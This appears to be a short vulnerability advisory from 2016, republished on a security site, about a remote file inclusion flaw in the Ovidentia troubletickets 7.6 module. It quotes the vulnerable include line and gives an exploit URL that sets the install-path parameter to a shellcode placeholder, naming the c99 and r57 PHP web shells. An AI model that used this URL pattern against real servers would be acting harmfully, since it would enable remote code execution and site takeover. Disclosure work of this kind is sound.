Ovidentia Troubletickets 7.6 Remote File Inclusion

2016.04.13
Credit: bd0rk
Risk: High
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-22

# Title: Ovidentia Module troubletickets 7.6 GLOBALS[babInstallPath] Remote File Inclusion Vulnerability # Author: bd0rk || SCHOOL-OF-HACK.NET # eMail: bd0rk[at]hackermail.com # Website: http://www.school-of-hack.net # Download: http://www.ovidentia.org/index.php?tg=fileman&sAction=getFile&id=17&gr=Y&path=Downloads%2FAdd-ons%2FModules%2Ftroubletickets&file=troubletickets-7-6.zip&idf=838 Proof-of-Concept: Vuln.-Code in /troubletickets-7-6/programs/statistique_evolution.php line 16 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ require_once $GLOBALS['babInstallPath'].'utilit/dateTime.php'; ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ [+]Usage: http://[someone]/troubletickets-7-6/programs/statistique_evolution.php?GLOBALS[babInstallPath]=[SHELLCODE] The problem: The GLOBALS[babInstallPath]-parameter isn't declared before require_once. So an attacker can inject some php-shellcode (c99 or r57 for example) 'bout it. It's no problem to patch it! Declare this parameter or use an alert! Greetings from bd0rk. HackThePlanet!


Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}

Copyright 2017, cxsecurity.com

 

Back to Top